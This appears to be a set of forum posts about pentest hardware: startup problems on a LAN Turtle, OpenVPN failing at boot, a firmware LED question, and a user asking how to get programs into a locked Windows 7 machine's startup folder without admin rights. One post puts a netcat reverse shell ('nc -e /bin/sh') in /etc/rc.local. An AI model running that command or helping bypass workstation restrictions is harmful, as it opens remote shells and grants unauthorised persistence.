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See the following threads, It appears a lot of the modules start on boot does not work. A workaround for anyone reading this is to add the command in /etc/rc.local For example I enable OpenVPN and start a nc reverse shell and my /etc/rc.local looks like this. Note there is no service or systemctl on the turtle /etc/init.d/openvpn start #sh reverse shell nc -e /bin/sh IP PORT #Add your commands above this line exit 0
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I have configured my openvpn on my turtle lan. The openvpn works fine if I manually start it in the menu or issue a /etc/init.d/openvpn start command. I have set the Bootup Status to Enabled. I reboot the turtlelan and openvpn does not start, viewing the menu it confirms that Bootup Status is Enabled and the Current Status is stopped. If I click on Start the openvpn starts up and works as expected. But I cannot get openvpn to start on bootup even though it is configured to. Side note: If you click on stop after start you get "Command failed: Not found" for an error and the openvpn is still started.
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hello, I was wondering if it was possible to place items in Windows 7 Startup folder without administrator rights. I have a user account to log in, but no admin rights. I have ordered a Ducky and was wondering if it would help me achieve that. I am open to all options, with or without the Ducky. Booting form USB or CD is not an option. Admin password is required to change the boot sequence. The Utilman.exe attack has been patched in this 64-Bit Windows 7 Enterprise.
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I'm getting a LED pattern from top to bottom (Red-Blue-Orange) at startup. Looking at the manual (page 9) it states that the "Firmware Flash completed successfully". I've left this on overnight and that's all it does.